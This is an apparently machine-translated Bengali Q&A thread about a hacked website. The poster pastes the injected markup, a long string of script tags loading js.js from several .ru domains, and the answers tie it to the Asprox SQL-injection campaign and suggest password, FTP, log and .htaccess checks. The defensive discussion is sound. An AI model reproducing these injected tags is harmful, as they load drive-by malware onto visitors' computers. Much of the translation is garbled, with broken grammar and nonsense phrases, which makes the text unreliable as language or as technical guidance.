আমার ওয়েবসাইট হ্যাক হয়েছে .. আমি কি করতে হবে?

আমার বাবা আজ আমাকে ডেকেছেন এবং বলেছেন যে তাদের ওয়েবসাইটে গিয়ে 168 জন ভাইরাস তাদের কম্পিউটারে ডাউনলোড করার চেষ্টা করছে। তিনি সব প্রযুক্তিগত নয়, এবং একটি WYSIWYG সম্পাদক সঙ্গে পুরো জিনিস নির্মিত।

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

তাই আমি এখন এটি জন্য মন্তব্য করেছেন। এটি তার পিএইচপি পাসওয়ার্ড খুঁজে বের করে একটি সাধারণ অভিধান শব্দ ছয় অক্ষর দীর্ঘ ছিল, তাই আমরা এটি হ্যাক কিভাবে এটি মনে করি। আমরা তার পাসওয়ার্ডটি 8+ ডিজিট অ-স্ট্রিং এ পরিবর্তিত করেছি (যেহেতু সে হান্ট-এন-প্যাক টাইপরর) সেহেতু পাসফ্রেজের জন্য নয়।

আমি একটি কে কে 98hs.ru -এ দেখেছি এবং এটি চিলিতে একটি সার্ভার থেকে হোস্ট করা হয়েছে। প্রকৃতপক্ষে এটির সাথে যুক্ত একটি ই-মেল ঠিকানাও আছে, কিন্তু আমি এই ব্যক্তিকে অপরাধী বলে গুরুতরভাবে সন্দেহ করি। সম্ভবত হ্যাক হ'ল এমন কিছু কিছু সাইট ...

আমি এই বিন্দুতে কি করতে হবে কোন ধারণা যদিও আমি আগে জিনিস এই সাজানোর সঙ্গে কখনও মোকাবিলা করেছি আগে যে কোনও পরামর্শ আছে?

তিনি webhost4life.com- এর মাধ্যমে প্লেইন জেন অ নিরাপদ FTP ব্যবহার করছেন। আমি তাদের সাইটে করতে sftp একটি উপায় এমনকি দেখতে না আমি তার ব্যবহারকারী নাম এবং পাসওয়ার্ড পেয়েছি আছি?

সুতরাং, এই সম্প্রদায়ের সাথে আরো প্রাসঙ্গিক করতে, হ্যাক হওয়া থেকে আপনার ওয়েবসাইটকে সুরক্ষিত রাখার জন্য আপনাকে যে পদক্ষেপগুলি গ্রহণ করা উচিত / সর্বোত্তম অনুশীলনগুলি করা উচিত?

রেকর্ডের জন্য, এখানে কোডের লাইন রয়েছে যা "জাদুভাবে" তার ফাইলে যোগ করা হয়েছে (এবং তার কম্পিউটারে তার ফাইলের মধ্যে নেই) - আমি এটি সম্পূর্ণভাবে নিশ্চিত করার জন্য মন্তব্য করেছি যে এটি কিছুই করবে না এই পৃষ্ঠায়, যদিও আমি নিশ্চিত যে জেফ এই বিষয়ে সতর্ক থাকবে):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js>
0
ro fr hi
শুধু fwiw, webhost4life পোর্ট 2222 এ sftp আছে।
যোগ লেখক ruffin, উৎস

8 উত্তর

আমি জানি এই গেমটি একটু দেরি হয়ে গেছে, কিন্তু জাভাস্ক্রিপ্টের জন্য উল্লিখিত URL টি এএসপিআরক্স বিট পুনরুজ্জীবনের অংশ হয়ে গেছে বলে জানা গেছে যা জুন মাসে শুরু হয়েছিল (কমপক্ষে এটি যখন আমরা ফ্ল্যাগ লাগানো হয়েছিল এটা)। এটি সম্পর্কে কিছু বিবরণ নীচে উল্লিখিত হয়:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

এই বিষয়ে কদর্য জিনিস হল যে কার্যকরীভাবে প্রতিটি Varchar টাইপ ক্ষেত্রের ডাটাবেস "সংক্রামিত" এই URL এর একটি রেফারেন্স স্পিট আউট, যা ব্রাউজার একটি বিট এটি সক্রিয় করে একটি ক্ষুদ্র iframe পায় যা। এই জন্য একটি মৌলিক SQL ফিক্স এখানে পাওয়া যাবে:

http://aspadvice.com/blogs/programming_shorts/ সংরক্ষণাগার / 2008/06/27 / Asprox-Recovery.aspx

ভীতিজনক ব্যাপার হল যে ভাইরাস সংক্রমণের জন্য সিস্টেমের টেবিলের দিকে তাকায় এবং অনেকগুলি শেয়ার হোস্টিং পরিকল্পনাগুলি তাদের ক্লায়েন্টদের জন্য ডাটাবেস স্থান ভাগ করে দেয়। তাই সম্ভবত এটি এমনকি আপনার বাবা এর সাইট যে সংক্রমিত ছিল না, কিন্তু অন্য কেউ এর হোস্টিং ক্লাস্টার মধ্যে এর সাইট কিছু দরিদ্র কোড লিখেছিলেন এবং এসকিউএল ইনজেকশন আক্রমণের দরজা খোলা।

যদি সে এখনো এত কাজ না করে, আমি তাদের হোস্টে একটি অবিলম্বে ই-মেইল পাঠাতে চাই এবং পুরো সিস্টেমকে সংশোধন করার জন্য তাদের সেই এসকিউএল কোডের একটি লিঙ্ক প্রদান করি। আপনি নিজের নিজস্ব ডাটাবেস টেবিলের সংশোধন করতে পারেন, কিন্তু সম্ভবতঃ যে সংক্রমন করছেন সেগুলিও আবার সেই গর্তের মধ্য দিয়ে চলে যাবে এবং পুরো লটটি সংক্রমিত হবে।

আশা করছি এটি আপনাকে আরো কিছু তথ্য দিয়ে কাজ করতে দেয়।

সম্পাদনা করুন: আরও দ্রুত চিন্তাধারা, যদি তিনি তার ওয়েবসাইট নির্মাণের জন্য হোস্ট অনলাইন ডিজাইন সরঞ্জামগুলির মধ্যে একটি ব্যবহার করছেন তবে সেই সমস্ত সামগ্রী সম্ভবত একটি কলামে বসে আছে এবং সেই ভাবে সংক্রামিত হয়েছিল।

0
যোগ

আপনি আপনার বাবা একটি ওয়েবসাইট পাবলিশিং টুল ব্যবহার করা হয়েছিল উল্লেখ।

প্রকাশনা সরঞ্জামটি যদি তার কম্পিউটার থেকে সার্ভারে প্রকাশ করে তবে এটি তার স্থানীয় ফাইলগুলি পরিষ্কার হয়ে উঠতে পারে এবং সেটি কেবল সার্ভারে পুনঃপ্রকাশ করতে হবে।

তার সাবধানে FTP এর চেয়ে তার সার্ভারে একটি ভিন্ন লগইন পদ্ধতি আছে কিনা তা দেখতে হবে ... যদিও এটি তার পাসওয়ার্ড ইন্টারনেটে স্পষ্ট-টেক্সট হিসাবে পাঠায় কারণ এটি খুব নিরাপদ নয়।

0
যোগ

চেষ্টা করুন এবং যতটা সম্ভব তথ্য সংগ্রহ করতে পারেন। হোস্ট আপনাকে আপনার অ্যাকাউন্টে তৈরি করা হয়েছে যে সমস্ত FTP সংযোগ দেখানো একটি লগ দিতে পারেন দেখুন। আপনি এটি ব্যবহার করতে পারেন কিনা তা দেখতে এটি একটি FTP সংযোগ যা পরিবর্তন করতে এবং সম্ভবত একটি IP ঠিকানা পেতে ব্যবহৃত হয়।

আপনি যদি ওয়ার্ডপ্রেস, ড্রুপাল বা অন্য কোনও কোড যা আপনি কোড না করেন তবে একটি আপলোডেড সফটওয়্যার ব্যবহার করছেন তবে এই ধরনের আপলোড কোডে দুর্বলতা থাকতে পারে। যদি এটি কাস্টম তৈরি হয়, তাহলে যে কোনও জায়গা যেখানে আপনি ব্যবহারকারীদের ফাইলগুলি আপলোড করতে বা বিদ্যমান ফাইলগুলিকে সংশোধন করতে অনুমতি দিবেন তা ডবল চেক করুন।

দ্বিতীয় জিনিস হিসাবে সাইট একটি ডাম্প নিতে হবে এবং অন্যান্য পরিবর্তন জন্য সবকিছু পরীক্ষা করা হবে। এটি শুধুমাত্র একটি একক সংশোধনী হতে পারে, কিন্তু এফটিপি এর মাধ্যমে যদি তারা জানতে পারে যে সেখানে কি কি আছে।

আপনার সাইটকে একটি সুপরিচিত ভাল অবস্থায় ফিরিয়ে আনুন এবং, যদি প্রয়োজন হয়, তবে সর্বশেষ সংস্করণে আপগ্রেড করুন।

আপনি একটি অ্যাকাউন্টে ফিরে নিতে একটি স্তর অনেক আছে। মানুষের নিচে ট্র্যাক করার চেষ্টা করা ক্ষতি কি বা এটি আপনি বাস এবং শিখতে এবং শক্তিশালী পাসওয়ার্ড ব্যবহার যেখানে এই কিছু?

0
যোগ

একটি ছয় শব্দ অক্ষর পাসওয়ার্ড দিয়ে, তিনি জংলী জোরপূর্বক হতে পারে। এটা তার এফটিপি আটকানো তুলনায় আরো সম্ভবত, কিন্তু এটি যে খুব হতে পারে।

একটি শক্তিশালী পাসওয়ার্ড দিয়ে শুরু করুন (8 অক্ষর এখনও মোটামুটি দুর্বল)

ইন্টারনেটে এই লিঙ্কটি দেখুন কি নিরাপত্তা ব্লগ সহায়ক।

0
যোগ

সাইট শুধু সামান্য স্ট্যাটিক এইচটিএমএল কি? যেমন, তিনি নিজেকে আপলোড পেজ কোডিং করতে পারবেন না যার দ্বারা আপস করা স্ক্রিপ্ট / পৃষ্ঠাগুলি আপলোড করার জন্য কেউ ড্রাইভিং করে?

কেন ওয়েব হোস্ট 4life জিজ্ঞাসা না তাদের কোনো এফটিপি লগ উপলব্ধ আছে এবং তাদের সমস্যা রিপোর্ট। আপনি জানেন না, তারা বেশ গ্রহণযোগ্য হতে পারে এবং ঠিক কি ঘটেছে আপনার জন্য খুঁজে বের করতে পারে?

আমি একটি ভাগ হোস্টার জন্য কাজ এবং আমরা সবসময় এই যেমন রিপোর্ট এবং স্বাগত জানাই এবং সাধারণত আক্রমণ ভিত্তি সঠিক ভেক্টর পইঠা এবং গ্রাহক ভুল ছিল যেখানে হিসাবে পরামর্শ দেওয়া

0
যোগ

আমরা সম্ভবত একই লোক থেকে হ্যাক করা হয়েছে! বা বট, আমাদের ক্ষেত্রে। তারা কিছু পুরানো ক্লাসিক এএসপি সাইটে URL এ এসকিউএল ইনজেকশন ব্যবহার করে যে কেউ আর আর বজায় রাখে না। আমরা আইপি আক্রমণ এবং আইআইএস তাদের অবরুদ্ধ পাওয়া এখন আমরা সব পুরাতন এএসপি refactor আবশ্যক। সুতরাং, আমার পরামর্শ হল আইআইএস লগগুলি প্রথম দেখায়, যদি আপনার সাইটের কোড বা সার্ভারের কনফিগারেশনে সমস্যা হয় তাহলে।

0
যোগ

শাটডাউন স্ক্রিপ্ট এড়ানোর জন্য এটি বন্ধ না করে ওয়েব সার্ভারটি আনপ্লাগ করুন। একটি ডাটা ড্রাইভ হিসাবে অন্য কম্পিউটারের মাধ্যমে হার্ড ডিস্ক বিশ্লেষণ করুন এবং আপনি লগ ফাইল এবং প্রকৃতির জিনিস মাধ্যমে অপরাধী নির্ধারণ করতে পারেন কিনা দেখুন। যাচাই করুন যে কোডটি নিরাপদ এবং তারপর এটি ব্যাকআপ থেকে ফিরিয়ে আনুন

0
যোগ

এটা আমার একটি ক্লায়েন্ট সম্প্রতি যে iPower- এর মাধ্যমে হোস্ট করা হয় ঘটেছে। আমি নিশ্চিত যদি আপনার হোস্টিং পরিবেশ এ্যাপাচি ভিত্তি করে ছিল নই, কিন্তু দ্বিগুণ .htaccess ফাইল যেগুলি আপনি বিশেষ করে webroot উপরে এবং ইমেজ ডিরেক্টরি ভেতরে, না সৃষ্টি করেছেন জন্য চেক নিশ্চিত করা যদি এটি ছিল, তারা কিছু nastiness উদ্বুদ্ধ করতে ঝোঁক পাশাপাশি (তারা উপর যেখানে তারা পড়ুন মধ্যে থেকে এসেছিলেন নির্ভর করে মানুষ পুনঃনির্দেশিত করা হয়)। এছাড়াও কোনো আপনি কোড যে আপনি লেখেননি জন্য সৃষ্টি করেছেন চেক করুন।

0
যোগ